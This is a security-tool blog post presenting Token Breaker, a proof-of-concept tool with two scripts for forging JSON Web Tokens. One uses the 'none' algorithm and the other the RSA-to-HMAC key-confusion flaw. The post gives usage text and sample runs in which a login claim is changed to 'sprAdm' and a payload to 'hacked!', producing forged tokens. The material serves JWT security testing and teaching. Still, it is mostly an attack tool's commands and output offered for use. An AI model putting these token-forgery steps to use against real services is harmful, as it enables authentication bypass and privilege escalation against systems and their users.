Token Breaker : JSON RSA To HMAC & None Algorithm Vulnerability POC

Token Breaker is focused on 2 particular vulnerability related to JWT tokens.

  • None Algorithm
  • RSAtoHMAC

Refer to this link about insights of the vulnerability and how an attacker can forge the tokens

Try out this vulnerability here

TheNone Usage

Usage: TheNone.py [-h] -t TOKEN
TokenBreaker: 1.TheNoneAlgorithm
Optional Arguments:
-h, –help show this help message and exit
Required Arguments:
-t TOKEN, –token TOKEN
JWT Token value
Example Usage: python TheNone.py -t [JWTtoken]

Output

$ ./TheNone.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6ImFkbSIsImlhdCI6IjE1Mzc1MjMxMjIifQ.ZWZhNjRmZDgzYWYzNDcxMjk5OTQ4YzE0NDVjMTNhZmJmYTQ5ZDhmYjY0ZDgyMzlhMjMwMGJlMTRhODA2NGU4MQ

TheNone

[] Decoded Header value is: {“alg”:”HS256″,”typ”:”JWS”}
[] Decoded Payload value is: {“login”:”adm”,”iat”:”1537523122″}
[*] New header value with none algorithm: {“alg”:”None”,”typ”:”JWS”}
[<] Enter your payload: {“login”:”sprAdm”,”iat”:”0″}
[+] Successfully encoded Token: eyJhbGciOiJOb25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6InNwckFkbSIsImlhdCI6IjAifQ.

RSAtoHMAC Usage

Usage: RsaToHmac.py [-h] -t TOKEN -p PUBKEY
TokenBreaker: 1.RSAtoHMAC
Optional Arguments:
-h, –help show this help message and exit
Required Arguments:
-t TOKEN, –token TOKEN JWT Token value
-p PUBKEY, –pubkey PUBKEY Path to Public key File
Example Usage: python Rsa

Output

$ ./RsaToHmac.py -t eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTU0MDM3NjA2MSwiZXhwIjoxNTQwMzc2MTgxLCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.HI50KvoHzcf7znWkrdugn5-O-68PpJAeiS21cLisC1WgEI21gWnqqvv3oqsnzbGkIt21NvPVHWFXoKJmLPKHeMeYLgc7nuVdF37WWd7M1XzZEP8zLoed7Z6K0KfNuR_CRsjogv1KAt8fJQvRzRhFi9dORHGxWRqpiInIgLKROLgXB-7Rv2SOYdyD_XylRaVJ1JpmmCyVmIbzVWhVuRJWT59AUm43yYRP3bBt-bnhMfkzFpwxTk3O84-On4DoIt6NIkRJaxXDUdDKscLGmSWQmdZsZds3XSV0ZgN0PObADqkZwwCBAqUTT7l5BVcBmasdnNuZ8cCDKzNtJr2cdow6zQ -p public.pem

RSA to HMAC

[] Decoded Header value: {“typ”:”JWT”,”alg”:”RS256″}
[] Decode Payload value: {“iss”:”http:\/\/demo.sjoerdlangkemper.nl\/”,”iat”:1540376061,”exp”:1540376181,”data”:{“hello”:”world”}}
[*] New header value with HMAC: {“typ”:”JWT”,”alg”:”HS256″}
[<] Enter Your Payload value: {“iss”:”http:\/\/www.google.com\/”,”iat”:2351287873,”exp”:1843945693,”data”:{“hello”:”hacked!”}}
[+] Successfully Encoded Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC93d3cuZ29vZ2xlLmNvbVwvIiwiaWF0IjoyMzUxMjg3ODczLCJleHAiOjE4NDM5NDU2OTMsImRhdGEiOnsiaGVsbG8iOiJoYWNrZWQhIn19.8jfUVCZPA7cWaSfe0LIjRt692RaFHnnvtw0jHoSAneQ

Download
R K

Share
Published by
R K
Tags: AlgorithmHMACJSONPOCRSAToken Breakervulnerability
5 years ago

Recent Posts

garak, LLM Vulnerability Scanner : The Comprehensive Tool For Assessing Language Model Security

garak checks if an LLM can be made to fail in a way we don't…

1 day ago

Vermilion : Mastering Linux Post-Exploitation For Red Team Success

Vermilion is a simple and lightweight CLI tool designed for rapid collection, and optional exfiltration…

1 day ago

AD-CS-Forest-Exploiter : Mastering Security Through PowerShell For AD CS Misconfiguration

ADCFFS is a PowerShell script that can be used to exploit the AD CS container…

1 day ago

Usage Of Tartufo – A Comprehensive Guide To Securing Your Git Repositories

Tartufo will, by default, scan the entire history of a git repository for any text…

1 day ago

Loco : A Rails-Inspired Framework For Rust Developers

Loco is strongly inspired by Rails. If you know Rails and Rust, you'll feel at…

2 days ago

Monolith : The Ultimate Tool For Storing Entire Web Pages As Single HTML Files

A data hoarder’s dream come true: bundle any web page into a single HTML file.…

2 days ago